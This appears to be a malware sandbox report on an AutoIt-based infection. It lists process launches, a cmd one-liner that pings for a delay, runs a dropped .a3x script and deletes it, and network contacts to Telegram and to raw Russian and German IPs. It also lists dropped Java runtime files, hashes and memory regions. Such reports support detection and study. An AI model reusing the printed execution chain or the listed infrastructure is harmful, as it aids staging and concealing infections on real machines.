"C:\Users\Admin\AppData\Local\acetiam\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\acetiam\\grayhound1..a3x"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && AutoIt3.exe C:\ProgramData\\lgASHAd.a3x && del C:\ProgramData\\lgASHAd.a3x

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

AutoIt3.exe C:\ProgramData\\lgASHAd.a3x

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 78.47.101.48:80 78.47.101.48 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 48.101.47.78.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
RU 89.23.96.126:80 89.23.96.126 tcp
US 8.8.8.8:53 126.96.23.89.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 89.23.96.126:80 89.23.96.126 tcp
DE 78.47.101.48:443 78.47.101.48 tcp
RU 89.23.96.126:80 89.23.96.126 tcp
RU 89.23.96.126:80 89.23.96.126 tcp
RU 45.141.86.82:15647 tcp
US 8.8.8.8:53 82.86.141.45.in-addr.arpa udp
RU 45.141.86.82:9000 45.141.86.82 tcp

Files

memory/3736-0-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3736-2-0x0000000000401000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

memory/2292-7-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BPDC1.tmp\idp.dll

memory/3736-29-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2292-30-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\interim.cmd

memory/2292-174-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

memory/3092-277-0x0000000000400000-0x0000000000415000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\i386\jvm.cfg

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr100.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\client\jvm.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\verify.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\meta-index

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\zip.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\java.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\meta-index

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\activation.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-json-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-hotkey-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-core.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-app-framework.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jna.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jkeymaster.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jfoenix.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\gson.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-php-sdk.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-compiled-module.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\commons-email.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\asm-all.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-jfoenix-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\jfxrt.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-runtime.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-mail-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-jsoup-ext.jar

memory/3432-341-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-344-0x0000000002540000-0x0000000002541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-xml-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jsoup.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zip-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zend-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-systemtray-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\mail.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\currency.data

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-api.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\zt-zip.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

memory/3432-402-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-406-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-411-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-423-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3120-430-0x0000000002CD0000-0x0000000002D06000-memory.dmp

memory/3120-431-0x00000000057F0000-0x0000000005E18000-memory.dmp

memory/4844-432-0x0000000005440000-0x0000000005462000-memory.dmp

memory/4844-434-0x0000000005D90000-0x0000000005DF6000-memory.dmp

memory/4844-433-0x0000000005D20000-0x0000000005D86000-memory.dmp

memory/3120-435-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bv3m2jsu.0tf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3120-454-0x00000000065D0000-0x00000000065EE000-memory.dmp

memory/3120-455-0x0000000006600000-0x000000000664C000-memory.dmp

memory/4844-457-0x0000000007570000-0x0000000007606000-memory.dmp

memory/4844-458-0x0000000006970000-0x000000000698A000-memory.dmp

memory/3120-459-0x0000000006B30000-0x0000000006B52000-memory.dmp

memory/4844-460-0x0000000007BC0000-0x0000000008164000-memory.dmp

memory/1908-485-0x000000006DB80000-0x000000006DBCC000-memory.dmp

memory/4448-484-0x000000006DB80000-0x000000006DBCC000-memory.dmp

memory/4448-483-0x0000000007270000-0x00000000072A2000-memory.dmp

memory/4448-504-0x0000000006690000-0x00000000066AE000-memory.dmp

memory/1908-505-0x0000000007580000-0x0000000007623000-memory.dmp

memory/4448-506-0x0000000007A10000-0x000000000808A000-memory.dmp

memory/4448-507-0x0000000007450000-0x000000000745A000-memory.dmp

memory/1908-508-0x0000000007AE0000-0x0000000007AF1000-memory.dmp

memory/1908-509-0x0000000007B20000-0x0000000007B2E000-memory.dmp

memory/4448-510-0x0000000007630000-0x0000000007644000-memory.dmp

memory/4448-511-0x0000000007720000-0x000000000773A000-memory.dmp

memory/4448-512-0x0000000007700000-0x0000000007708000-memory.dmp

memory/2292-516-0x0000000000400000-0x0000000000588000-memory.dmp

memory/2292-525-0x0000000000400000-0x0000000000588000-memory.dmp

memory/3736-526-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3432-541-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-547-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-556-0x0000000002540000-0x0000000002541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4UM4U.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/4520-744-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/4520-745-0x0000000004E90000-0x0000000004F22000-memory.dmp

memory/4520-746-0x0000000005100000-0x00000000052C2000-memory.dmp

memory/4520-748-0x0000000005030000-0x0000000005080000-memory.dmp

memory/4520-747-0x0000000004FB0000-0x0000000005026000-memory.dmp

memory/4520-749-0x0000000004DC0000-0x0000000004DCA000-memory.dmp

memory/4520-750-0x00000000060C0000-0x00000000065EC000-memory.dmp

memory/4520-751-0x00000000054B0000-0x00000000054CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpCE64.tmp

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\tmpCE77.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

memory/4520-775-0x0000000007A40000-0x0000000007A4A000-memory.dmp